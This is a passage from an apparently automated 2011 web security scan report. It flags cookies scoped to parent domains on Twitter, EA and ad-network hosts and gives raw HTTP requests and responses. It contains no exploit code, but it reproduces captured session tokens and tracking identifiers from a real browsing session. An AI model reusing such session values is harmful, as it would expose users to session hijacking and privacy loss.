X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 543ba3d8776a2596391f065315b725309d146be2
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--fae0483a5842011ad9a0222333fac5dc436bfe1e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4498
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

12.2. http://api.twitter.com/1/urls/resolve.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/urls/resolve.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKRS&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKy4&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofOD&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofnG&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oflE&urls%5B%5D=http%3A%2F%2Fow.ly%2F5of3j&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeXg&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeNB&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oa4Y&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o5k9&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4YM&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4Jj&urls%5B%5D=http%3A%2F%2Fbit.ly%2Fl0x4zn HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.2.10.1308923300; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923447-17753-60906
X-RateLimit-Limit: 1000
ETag: "62bd892d49144959eee88efaaacc609a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:50:47 GMT
X-RateLimit-Remaining: 955
X-Runtime: 0.01192
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4574163279f6bcccd0daeaf1111869debe1ca4fd
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 945
Connection: close

{"http:\/\/ow.ly\/5of3j":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5o4YM":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5oflE":"http:\/\/support.eamobile.com\/","http:\/\/ow.ly\/5o4Jj":"http:\/\/sup
...[SNIP]...

12.3. http://www.ea.com/dynajs/gus.jsx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ea.com
Path:   /dynajs/gus.jsx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynajs/gus.jsx HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 File Not Found
Date: Fri, 24 Jun 2011 13:43:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; path=/; domain=.ea.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html


12.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

12.5. http://a.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cyyg8%2BAquYajlyU38mbKfM6zzAAi91YoxCASmOO%2F6vslaz3Wz6SAb7WNSoJ42tqPjZBZm%2BwU7nz%2BqSaZkPum3%2BCcVtWs4kWprLiUT69hq%2BB7egueH9fmWFooawy%2FIlN07%2FywLbqigg1lXylCtaXnEdSXrSN%2BG6wl4qKM0pyjpXM7wDjjF%2FTnaw27LAO86PDR8rVQBsHkjHYPXkvQDaVu1cNDOjedkku9rP5M4aXEKwkdj4GS5v130Su5DukdLRdsllQxY%2B7lxFgDjvyHHxdnOJN0dE%2F4NbWDBdda3%2BTZ9xk2kRE4siiSl%2FES6mcPHsh5QYNe%2B3r%2BixhOSblhWvWuhng4yHSIxh%2FdseAuHpAB4bgzwOQgOQtu6mRAPuh3ZeeWE4ftB5QnNagzzBV6tjFj2Gx16lEDbzzYwMXeK3q5f6XdSiNsf7FIJww9fjsd4IIexvm8cX3okZybYL6im77R%2Fm6D%2Biy0lxPC8bFKQsAI777CENYtplCK92RelBIxTakV2KZ9zjQZSBLVArtq%2Bd3A8brImrUXwY47CZCPMyU3E7HGBv5tRNsvK5locqtXgvWrgSFbQU%2FS7P2yi6Tu5HqAksMuAf7uFBpCtKBX0SbhRUzjxprR%2Bdzt3S5q1OPrunUWDaTyE%2FfH2xdVd9zwp8epdDU3YBru1Z4Bpl9GYvlnLLFyLJgKqp%2F2hzCYMa%2BYiQ0ZuhV1QwKhaQNvGQTe6134KX2JdCP%2BuD8wI%2FlVlbm5EPzEufUaBJmtDn8HMCishvBcS

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:58 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 23 Jun 2011 02:10:58 GMT
Last-Modified: Thu, 23 Jun 2011 02:10:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CcUXouB4rLUo4z%2FFKqv9TTqetSZc6URjOUkrEwZxL19iFoM3B6TaCLVGSPl4YcBy8M5VAiHvrOT0p0MJYOkmTpDIOg2x6eeiUsYim2C5zms%2BvrRLQn%2FoybFZANl57jMSeqLSZr0cDlofYcqgbyhV3RKv1yXyCctLJPQejPFuG%2FSTaq20qktFEGeqalakL5cpnxnT9tbUjhJLDFmel2Kl7C%2B5z4szEshst11JdDKJH9eq%2BoqpkDMROMNvFjfMDpfNItKW%2FvjCiL3RPcp47TxOLhJ1Q2YxLnIEZhyzUPf2LGOE6tEXu99zJEid0dKnMpG%2Bt9tIdB8UM95tAZHMW4LcN96ZflsymOkOyFv%2F1NsyGKFpkir%2Bjuwdzi7qcC%2FUA0hVVE9G7U9zUMou5%2Bbc2a66HREcxgoJ%2BDYN1%2Bhl0najue0Mcc2UFyncDi8SA02XiMCyX0QJt1ZGMqincsgjg4PvOacguI41%2FRN9FLR0lJOwU0vGk7GnXdTKda3JAzbk22zhYUV2US7JJuCxrTdVyzrTwrXTOQRiQNUhR79O7q641BJrqJ1WoKm3ej57gnXAZz6Ea6eF4VqJJZafHUjoVvCR4%2FzbKbaCZ6W6F2FV54q3JzisnJLOIeRfLB8wzZ2Yl%2Bvao5sI%2BQsCZtivHP%2BZMXU4rAiUKToqmTb9NqrSxuxywPEfo2vtC%2FlqOA09MEIfqXMW%2Bzo1PK9bgH7HezrWA467f7Y0maS7n%2FbXXPRcfp3kGW0ejb6ZBA%2B2%2F1ebBdFEbxJtE; expires=Sun, 25-Dec-2011 02:10:58 GMT; path=/; domain=.netmng.com
Content-Length: 688
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38143;sz=1x1;ord=1?'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.bo
...[SNIP]...

12.6. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Set-Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; path=/; domain=.doubleclick.net; expires=Mon, 13 May 2013 10:09:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 24 Jun 2011 13:22:38 GMT
Server: GFE/2.0
Content-Type: text/html


12.7. http://ad.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1470&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_hbe9=c8z%3A2029o%3A1; rth=2-ll8nk2-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 25 Jun 2011 02:11:00 GMT
Location: http://ads.lucidmedia.com/clicksense/pixel?id=103769&t=i
Connection: close
Set-Cookie: T_hbe9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e5fw=dlx%3A232ib%3A1; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-dlx~232ib~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Content-Length: 0


12.8. http://ads.lucidmedia.com/clicksense/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=103769&t=i HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Sat, 25 Jun 2011 02:11:01 GMT
Expires: Sat, 25 Jun 2011 02:11:01 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1307844&t=2
Content-Length: 0
Connection: close


12.9. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8707574490954974&output=html&h=250&slotname=0966043985&w=300&lmt=1308940014&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922014502&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218&correlator=1308922009816&frm=4&adk=3718087554&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=2&dtd=19&xpc=95bno1LOUQ&p=http%3A//www.gamersdailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CEJozEpiencOrSADIBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDe; PRgo=BBBAAuILBBVCFUE6; PRimp=28A60400-6EA1-2C4A-0209-D6A000040100; PRca=|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:31:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 14924
Set-Cookie:PRvt=CEJozEpiencOrSADIBBeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDeJWuEpnU4MzRwAAFBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=75A60400-3338-7034-0309-5AE000050101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJyC*1646:2|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJyCAA08:2|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FADR:2|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
